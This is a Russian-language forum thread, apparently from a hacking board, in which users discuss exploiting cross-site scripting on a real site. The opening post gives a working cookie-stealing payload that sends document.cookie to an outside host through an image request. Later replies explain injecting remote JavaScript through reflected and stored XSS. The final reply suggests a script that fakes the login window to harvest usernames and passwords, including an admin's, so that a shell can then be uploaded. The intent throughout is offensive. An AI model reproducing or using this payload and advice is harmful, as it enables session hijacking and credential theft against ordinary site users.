Есть пассивная XSS, работает только с этим кодом:



img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;


За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?

Можно ли загнать на сервер какого нибудь червя?


Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.

Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.


Есть на примере активная XSS.

Где взять код который можно попробовать вшить?

Есть на примере активная XSS.
Где взять код который можно попробовать вшить?


Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.

Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.


То что код можно вшить любой я понял, как это сделать я не понимаю!

подскажите пожалуйста!

То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!


Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.

как это сделать я не понимаю!


Выучить JS самому или заказать у кого-нибудь написание кода за деньги.

upd:

Пример того, что можно делать с пассивкой - /thread275417.html

Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?

сделай js файл который подменит окно авторизации,

черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь